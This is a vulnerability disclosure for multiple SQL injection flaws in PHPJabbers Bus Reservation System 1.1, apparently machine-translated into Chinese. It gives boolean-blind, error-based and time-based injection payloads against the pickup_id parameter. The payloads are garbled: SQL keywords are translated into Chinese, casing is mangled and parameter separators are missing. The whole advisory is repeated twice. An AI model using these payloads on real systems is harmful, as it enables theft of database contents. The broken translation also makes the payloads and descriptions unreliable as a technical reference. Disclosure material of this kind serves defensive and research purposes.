## title:公交保留系统1.1多sqli
##作者: nu11secur1ty
## date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ pickup_id”参数似乎很容易受到SQL注入的影响
攻击。有效载荷'在pickup_id参数中提交,一个
返回数据库错误消息。您应该查看内容
错误消息以及应用程序对其他输入的处理
确认是否存在漏洞。攻击者可以偷走
来自所有数据库的信息!
状态:高临界脆弱性
[+]有效载荷:
``MySQL
---
参数: pickup_id(get)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD:控制器=pjfrontendaction=pjactiongetLocationsLocale=1Hide=0Index=6138pickup_id=(select
((3959=3959)然后0x3927 else(选择8499联合选择
2098)end))session_id=
type:基于错误的
title: mysql=5.6基于错误的基于错误的参数替换(gtid_subset)
PAYLOLAL:控制器=PJFRONTENDACTION=PJACTIONGETLOCALESLOCALE=1HIDE=0INDEX=6138PICKUP_ID=GTID_SUBSET(CONCAT(0x71626B7A71)
(ELT(5210=5210,1))),0x716a6b7171),5210)session_id=
Type:基于时间的盲人
title: mySQL=5.0.12基于时间的盲人- 参数替换(sidration)
PAYLOAD:控制器=pjfrontendaction=pjactiongetLocationsLocale=1Hide=0Index=6138pickup_id=(select
2616来自(Select(Sleep(15)))clir)session_id=
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../2023/bus-reservation-system-system-1.1-sqli)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/bus-restrive-system-11-multiple-sqli.html)
##时间花费:
00:25:00
##作者: nu11secur1ty
## date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ pickup_id”参数似乎很容易受到SQL注入的影响
攻击。有效载荷'在pickup_id参数中提交,一个
返回数据库错误消息。您应该查看内容
错误消息以及应用程序对其他输入的处理
确认是否存在漏洞。攻击者可以偷走
来自所有数据库的信息!
状态:高临界脆弱性
[+]有效载荷:
``MySQL
---
参数: pickup_id(get)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD:控制器=pjfrontendaction=pjactiongetLocationsLocale=1Hide=0Index=6138pickup_id=(select
((3959=3959)然后0x3927 else(选择8499联合选择
2098)end))session_id=
type:基于错误的
title: mysql=5.6基于错误的基于错误的参数替换(gtid_subset)
PAYLOLAL:控制器=PJFRONTENDACTION=PJACTIONGETLOCALESLOCALE=1HIDE=0INDEX=6138PICKUP_ID=GTID_SUBSET(CONCAT(0x71626B7A71)
(ELT(5210=5210,1))),0x716a6b7171),5210)session_id=
Type:基于时间的盲人
title: mySQL=5.0.12基于时间的盲人- 参数替换(sidration)
PAYLOAD:控制器=pjfrontendaction=pjactiongetLocationsLocale=1Hide=0Index=6138pickup_id=(select
2616来自(Select(Sleep(15)))clir)session_id=
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../2023/bus-reservation-system-system-1.1-sqli)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/bus-restrive-system-11-multiple-sqli.html)
##时间花费:
00:25:00